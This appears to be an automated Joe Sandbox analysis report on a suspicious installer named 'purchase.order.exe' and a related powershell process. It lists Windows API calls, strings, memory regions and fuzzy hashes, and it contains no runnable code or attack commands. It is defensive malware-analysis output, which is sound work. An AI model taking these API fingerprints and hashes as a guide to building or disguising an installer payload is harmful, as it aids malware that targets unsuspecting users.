                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                          • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                          • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                          APIs
                                          • GetDC.USER32(?), ref: 00401E76
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                          • String ID: Calibri
                                          • API String ID: 3808545654-1409258342
                                          • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                          • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                          • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                          • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                          • MulDiv.KERNEL32(000C3728,00000064,000C392C), ref: 00403001
                                          • wsprintfW.USER32 ref: 00403011
                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040300B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                          • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                          • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                          • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                          APIs
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseEnum$DeleteValue
                                          • String ID:
                                          • API String ID: 1354259210-0
                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                          • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                          • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                          • GetClientRect.USER32(?,?), ref: 00401E0A
                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                          • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                          • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                          • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                          • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                          • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                          • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                          APIs
                                          • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                          • wsprintfW.USER32 ref: 00404E17
                                          • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                          • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                          • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                          • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                          APIs
                                            • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                            • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405EC9
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                          • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405F71
                                          • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: 4Mw$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 3248276644-3850734506
                                          • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                          • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                          • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                          • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-2145255484
                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                          • GetTickCount.KERNEL32 ref: 0040306F
                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                          • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                          • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                          • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00405569
                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                            • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                          • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                          • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                          • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                          APIs
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                          • RegCloseKey.ADVAPI32(?), ref: 00406460
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: : Completed
                                          • API String ID: 3356406503-2954849223
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                          APIs
                                          • FreeLibrary.KERNEL32(?,774D3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                          • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-2145255484
                                          • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                          • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                          • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                          • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                          APIs
                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-3080008178
                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                          • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                          • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$tLk$tLk$tLk$tLk$tLk$x.k$x.k$x.k$-k$-k
                                          • API String ID: 0-3402847943
                                          • Opcode ID: 4bd02f960b54049d735a232454f88336944f522c7ca20a5f99e73480c656d29a
                                          • Instruction ID: 5345dea2b148798f5bc6303d21a5924eb1a419f4174379943100c74d19598fd1
                                          • Opcode Fuzzy Hash: 4bd02f960b54049d735a232454f88336944f522c7ca20a5f99e73480c656d29a
                                          • Instruction Fuzzy Hash: A7035E74E003289FEB64DB54C851BDAB7B2BF85304F1095A9D80AAB741CB75EE81CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Instruction ID: 35a2f46518047a77b62dc4ecc12aa963a3f9219c482f737cf8ea68fece08b17b
                                          • Opcode Fuzzy Hash: 08a35ab06a1935fc4dcdcc39ae88d2bf359ee6b18127e50de7c49ee22ef8b5f2
